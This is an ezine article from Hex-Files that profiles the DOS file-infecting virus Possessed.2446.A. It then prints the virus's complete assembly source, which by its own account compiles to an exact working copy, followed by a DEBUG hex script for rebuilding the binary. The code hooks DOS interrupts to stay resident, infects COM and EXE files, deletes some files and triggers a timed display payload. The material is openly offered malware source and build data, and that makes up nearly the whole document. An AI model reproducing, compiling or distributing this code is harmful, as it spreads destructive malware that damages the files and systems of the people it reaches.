Copy Link
Add to Bookmark
Report

Hexfiles Issue 2 File 008

eZine's profile picture
Published in 
hexfiles
 · 4 months ago

  
HEX-FILES No. 2 File 008
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus: Possessed.2446.A
Alias: Possessed 1.08, Possessed IV
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: INT 21; AH=30; DX=ABCD --> DX=DCBA

VirusLength: 2446 bytes
InfectiveLength:
COM: 2446 bytes
EXE: 2446 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1067..Eof-1066] = 41h 4bh) and
(File[16..81] = Virus[3..68])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"Version 1.08", "Fucker."
"C:*.COM", "C:*.EXE" <--- drive letters varies
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
After 3 or 4 hours from other programs



ÄÄ POS2446A.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2446.A
; Alias: Possessed 1.08, Possessed IV
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you use
; *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original virus,
; that is, compiled by masm 5.0 This can also be compiled in a86 4.02 but
; you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
ExeHeader struc
isExeId dw ?
isMod dw ?
isBlocks dw ?
isRelocItemCt dw ?
isHeaderSize dw ?
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?
isSp dw ?
isCxSum dw ?
isIp dw ?
isCs dw ?
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0

PossessedEntry:
jmp FirstGenerationEntry

PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26

isDos:
jmp DosHandler


DosVersion db ?
FirstGenerationFlag db 1
DosInterrupt label dword
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ?
ErrorIntSegment dw ?
AllocatedMemory dw ?
Timer dw ?
Hour db ?
ActivateLength db ?
ViruSs dw ?
ViruSp dw ?
ExeSs dw ?
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?
ExeLengthHi dw ?
Environment dw ?
Psp dw ?

DosHandler:
pushf
cmp ax,4b00h
jne SeeIfIdCall
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl
mov ExeAsciiz,bl
mov ah,2fh
call UseDos
push es
push bx
mov ah,1ah
mov dx,offset VirusDta
call UseDos
mov cx,23h
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect
jmp SeeIfIdCall

InfectOthersFirst:
mov dx,offset VirusDta
add dx,28
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl
mov byte ptr [bx+1],':'
call SaveRegistersBeforeInfect
jmp InfectExecutingProgram

SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret

SeeIfIdCall:
cmp ah,30h
jne PassToDos
cmp dx,0abcdh
jne PassToDos
mov dx,0dcbah

assume cs:Possessed, ds:nothing

PassToDos:
popf
jmp DosInterrupt

SetInfect:
mov cs:VictimAsciizSegment,ds
mov cs:VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters

GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb
push ds
push dx

assume cs:Possessed, ds:Possessed

push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov cs:Attribute,cx
mov ax,4301h
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov cs:Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov cs:FileDate,dx
mov cs:FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,cs:Handle
mov ax,4202h
call UseDos
jc Relay2
mov cs:ComLength,ax
call MovePointerBegin
Relay2:
jc Relay3
mov cx,cs:ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h
je DoneWithFile
jmp NotInfected
InfectCheckCom:
mov si,cx
sub si,(VirusStack-FaceData)
js Relay4
cmp word ptr [si],4b41h
je VerifyComInfection
Relay4:
jmp NotInfected

Fucker db 'Fucker.'

VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,((isDos-PossessedId)/2)
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile

assume cs:Possessed, ds:Possessed

DoneWithFile:
push cs
pop ds
mov es,AllocatedMemory
mov ah,49h
call UseDos
mov bx,ds:Handle
mov dx,ds:FileDate
mov cx,ds:FileTime
mov ax,5701h
call UseDos
mov ah,3eh
call UseDos
mov ds,ds:VictimAsciizSegment
mov dx,ds:VictimAsciizOffset

assume cs:Possessed, ds:nothing

mov cx,cs:Attribute
mov ax,4301h
call UseDos
jmp RestoreRegisters

NotInfected:
push es
mov ds,cs:VictimAsciizSegment
mov si,cs:VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov al,4
cmp ActivateLength,11
je SetActivateTime
cmp ActivateLength,al
jne SetActivateTime
mov al,3
SetActivateTime:
mov ActivateLength,al
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler
mov di,offset NameofVictim
call Compare
pushf
neg al
call Scrambler
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay5:
jmp DoneWithFile
SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace
CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jb Relay5

assume cs:Possessed, ds:nothing

EnoughDiskSpace:
mov bx,cs:Handle
call MovePointerBegin
jc Relay5
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?
LocEndOfFile dw ?

assume cs:Possessed, ds:Possessed

isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,90/2
cld
repe movsw
pop es
push cs
pop ds
mov dx,ds:ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h)
mov LocComEntry,dx
jmp JumperSet
ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,cs:ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack
NotCommandCom:
xor dx,dx
mov ah,40h
call UseDos
jnc WriteOk
Relay6:
jmp Relay5

WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay6
jmp DoneWithFile

DeleteFile:
mov ds,cs:VictimAsciizSegment
mov dx,cs:VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile


PixelRow equ Environment+100h
PixelColumn equ Psp+100h

isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt
ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate
EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,200h
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay8
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,cs:Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h
call UseDos
mov dx,0
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay8:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

isError:
xor ax,ax
mov es,ax
mov ss,cs:SaveSsOnInt21
mov sp,cs:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret

UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov cs:SaveSpOnInt21,sp
mov cs:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

ExeEntry:
mov dx,0abcdh
mov ah,30h
int 21h
xor dx,0dcbah
je ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

ExecuteExeVictim:
mov ax,es
add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h
SecondCodeMove:
cld
repe movsb
FirstGenerationEntry:
mov ax,es
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

SetUpPossessed:
mov ax,sp
sub ax,100h
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax
pop ax
push ds
push es
mov ds,ax
push cs
pop es
mov si,0ah
mov di,offset VirusStack
mov cx,6
cld
repe movsw
mov bx,offset isTerminate
mov ds:[0ah],bx
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId
mov cx,FaceData-EncryptedPossessedId
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ds:ExeEntry
sub ax,(0cdbah-3521h)
int 21h
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl
add ax,(3508h-2521h)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h
call UseDos
push cs
pop ds
mov es,Psp
mov ah,49h
call UseDos
mov dx,offset VirusStack
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h
call UseDos
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0
jmp GetReturnCode
NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+3],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName
CheckNextChar:
inc si
loop FindFileName
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam
cmp DosVersion,3
jc OldDos
call UseDos
jmp VictimExecuted
OldDos:
int 21h
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh
int 21h
mov ah,4ch
int 21h

NameofVictim db 13 dup (?)

ComEntry:
add si,100h
mov dx,0abcdh
mov ah,30h
int 21h
xor dx,0dcbah
jne NotInMemory
sub si,5ah ;(VirusStack-SaveVictimCode)
mov di,100h
mov cx,90/2
cld
repe movsw
mov bx,100h
clc
jmp bx

assume cs:Possessed, ds:Possessed

NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
push cs
pop ds
mov di,100h
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)
mov DosIntSegment+100h,es
mov word ptr DosIntOffset+100h,offset SecondCodeMove+100h
jmp cs:DosInterrupt+100h

VersioNumber db 'Version 1.08 '
SaveVictimCode db 90 dup (?)
VirusStack dw ?
VirusAsciiz db 13 dup (?)
ExecParam dw 7 dup (?)
dontknow1 db 21 dup (?)
VirusDta db 43 dup (?)
dontknow2 db 21 dup (?)
dontknow3 db 6 dup (?)

SaveSpOnInt21 dw ?
SaveSsOnInt21 dw ?
VictimAsciizSegment dw ?
VictimAsciizOffset dw ?
Attribute dw ?
Handle dw ?
FileTime dw ?
FileDate dw ?
ComLength dw ?

Possessed ends

end PossessedEntry

ÄÄ POS2446A.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


ÄÄ POS2446A.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N POS2446A.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AA 0B 57 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E
E 0140 4A 6F 6E 20 47 75 6D 62 61 20 6F 66 20 41 64 55
E 0150 0A 1A 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20
E 0160 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48
E 0170 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A
E 0180 0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50
E 0190 75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61
E 01A0 72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62
E 01B0 6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69
E 01C0 6D 70 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69
E 01D0 6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20
E 01E0 62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74
E 0210 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A
E 0220 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75
E 0230 74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62
E 0240 65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E
E 0250 73 69 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73
E 0260 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A
E 0270 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73 74
E 0280 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61
E 0290 74 69 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65
E 02A0 73 65 61 72 63 68 20 70 75 72 70 6F 73 65 73 20
E 02B0 6F 6E 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07
E 02C0 01 B4 09 CD 21 B4 4C CD 21 E9 52 07 0D 50 4F 53
E 02D0 53 45 53 53 45 44 21 20 42 77 61 21 20 68 61 21
E 02E0 20 68 61 21 20 68 61 21 20 68 61 21 24 08 20 0A
E 02F0 0D 41 75 74 68 6F 72 3A 20 4A 6F 6E 4A 6F 6E 20
E 0300 47 75 6D 62 61 20 6F 66 20 41 64 55 0A 1A EB 29
E 0310 90 06 00 4A 00 46 0C 2E 03 46 0C C8 04 06 0D AF
E 0320 0D 9C 01 03 04 08 04 0A 06 00 00 00 00 00 00 00
E 0330 00 00 00 00 00 F0 0C F6 0C 9C 3D 00 4B 75 7C 1E
E 0340 06 56 57 50 53 51 52 8B DA 8A 1F 0E 1F 88 1E 08
E 0350 07 88 1E 10 07 B4 2F E8 4A 04 06 53 B4 1A BA C0
E 0360 09 E8 40 04 B9 23 00 BA 08 07 B4 4E E8 35 04 73
E 0370 1F BA 10 07 B4 4E E8 2B 04 73 15 5A 1F B4 1A E8
E 0380 22 04 5A 59 5B 58 5F 5E 07 1F E8 1A 00 EB 2C 90
E 0390 BA C0 09 83 C2 1C 8B DA 8A 0E 08 07 88 0F C6 47
E 03A0 01 3A E8 02 00 EB D4 1E 06 56 57 50 53 51 52 EB
E 03B0 1E 90 5A 59 5B 58 5F 5E 07 1F C3 80 FC 30 75 09
E 03C0 81 FA CD AB 75 03 BA BA DC 9D 2E FF 2E 4A 00 2E
E 03D0 8C 1E 0A 0A 2E 89 16 0C 0A 8B F2 83 C6 02 8B DE
E 03E0 80 3C 5C 75 06 8B DE 43 EB 06 90 80 3C 00 74 15
E 03F0 46 EB ED B8 24 25 2E 8B 16 52 00 2E 8E 1E 54 00
E 0400 E8 A1 03 EB AD 8B F3 0E 07 BF D4 08 B9 0D 00 FC
E 0410 F3 A4 1E 52 06 1F B8 24 35 E8 88 03 8C 06 54 00
E 0420 89 1E 52 00 B8 24 25 BA C8 04 E8 77 03 5A 1F B8
E 0430 00 43 E8 6F 03 72 BC 2E 89 0E 0E 0A B8 01 43 B9
E 0440 20 00 E8 5F 03 72 EE B8 02 3D E8 57 03 72 E6 2E
E 0450 A3 10 0A 8B D8 B8 00 57 E8 49 03 2E 89 16 14 0A
E 0460 2E 89 0E 12 0A BB FE FF B4 48 E8 37 03 73 07 B4
E 0470 48 E8 30 03 72 BF 2E A3 56 00 33 C9 8B D1 2E 8B
E 0480 1E 10 0A B8 02 42 E8 1B 03 72 07 2E A3 16 0A E8
E 0490 2D 03 72 11 2E 8B 0E 16 0A 33 D2 2E 8E 1E 56 00
E 04A0 B4 3F E8 FF 02 72 3D 0E 07 33 F6 81 3C 4D 5A 75
E 04B0 0A 81 7C 12 70 19 74 2C EB 62 90 8B F1 81 EE 2B
E 04C0 04 78 06 81 3C 41 4B 74 0A EB 51 90 46 75 63 6B
E 04D0 65 72 2E BE 10 00 BF 03 00 B9 21 00 FC F3 A7 74
E 04E0 03 E9 47 01 0E 1F 8E 06 56 00 B4 49 E8 B5 02 8B
E 04F0 1E 10 0A 8B 16 14 0A 8B 0E 12 0A B8 01 57 E8 A3
E 0500 02 B4 3E E8 9E 02 8E 1E 0A 0A 8B 16 0C 0A 2E 8B
E 0510 0E 0E 0A B8 01 43 E8 8B 02 E9 96 FE 06 2E 8E 1E
E 0520 0A 0A 2E 8B 36 0C 0A 8A 14 80 EA 40 1F B0 04 80
E 0530 3E 5B 00 0B 74 08 38 06 5B 00 75 02 B0 03 A2 5B
E 0540 00 BE 16 05 B9 0B 00 B0 17 E8 7E 02 BF D4 08 E8
E 0550 82 02 9C F6 D8 E8 72 02 9D 72 11 80 3E 48 00 03
E 0560 73 02 EB 80 C6 06 5B 00 0B EB 15 90 B4 36 E8 33
E 0570 02 33 D2 F7 E3 F7 E1 0B D2 75 05 3D C4 09 72 E2
E 0580 2E 8B 1E 10 0A E8 37 02 72 D8 2E 8E 1E 56 00 33
E 0590 F6 81 3C 4D 5A 75 13 E9 40 01 2E 8B 1E 0C 01 2E
E 05A0 8B 36 0E 01 FF E3 AA 0B 57 0B 1E 1E BF 34 09 B9
E 05B0 2D 00 FC F3 A5 07 0E 1F 8B 16 16 0A 80 3E 5B 00
E 05C0 0B 75 0F 89 16 DF 02 81 EA AD FF 89 16 DD 02 EB
E 05D0 13 90 52 81 C2 E1 09 89 16 DD 02 5A 81 C2 8E 09
E 05E0 89 16 DF 02 BE D1 02 33 FF B9 08 00 FC F3 A5 BE
E 05F0 03 00 B9 21 00 FC F3 A5 E8 C4 01 1F 2E 8B 0E 16
E 0600 0A 2E 80 3E 5B 00 0B 75 04 81 E9 8E 09 33 D2 B4
E 0610 40 E8 90 01 73 03 E9 49 FF 0E 1F BA 00 00 B9 8E
E 0620 09 B4 40 E8 7E 01 72 EE E9 B9 FE 2E 8E 1E 0A 0A
E 0630 2E 8B 16 0C 0A B4 41 E8 6A 01 E9 A7 FE 9C 2E FF
